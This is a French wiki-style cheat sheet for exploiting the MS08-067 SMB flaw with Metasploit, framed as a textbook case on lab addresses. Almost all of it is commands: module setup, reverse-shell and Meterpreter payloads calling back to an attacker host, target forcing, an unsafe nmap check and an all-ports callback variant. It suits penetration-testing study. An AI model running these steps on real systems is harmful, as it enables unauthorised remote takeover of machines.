Ms08 067
Aller à la navigation
Aller à la recherche
| Fiche express | |
|---|---|
| Domaine | Exploitation SMB |
| Module | windows/smb/ms08_067_netapi
|
| Contexte | Metasploit |
| Voir aussi | Msfconsole · Meterpreter |
MS08-067 est une faille SMB ancienne mais encore fréquemment rencontrée. C'est un cas d'école de l'exploitation avec Metasploit.
Mise en place
use exploit/windows/smb/ms08_067_netapi
show options
set RHOST 192.168.0.61
Choix du payload
Une fois positionné dans l'exploit, on liste les payloads disponibles. Le payload shell/reverse_tcp nécessitera un sessions -u 1 pour être promu en meterpreter ; meterpreter/reverse_tcp le donne directement.
show payloads
set payload windows/shell/reverse_tcp
# ou directement
set payload windows/meterpreter/reverse_tcp
show options
Ce payload identifie parfois mal le système distant ; on peut forcer la cible pour éviter l'échec :
show targets
info
set target 3
set LHOST 192.168.0.19
set LPORT 8080
exploit
Validation par nmap
nmap -sT -A --script=smb-check-vulns --script-args=unsafe=1 -P0 192.168.0.61
- Référence : http://www.uninformed.org/?v=2&a=4
Variante « tous les ports »
Un pare-feu coupe souvent les flux sortants mais pas nécessairement tous les ports entrants. Pour pallier un manque d'information :
search ports
set payload windows/meterpreter/reverse_tcp_allports
exploit -j
sessions -l
sessions -i 1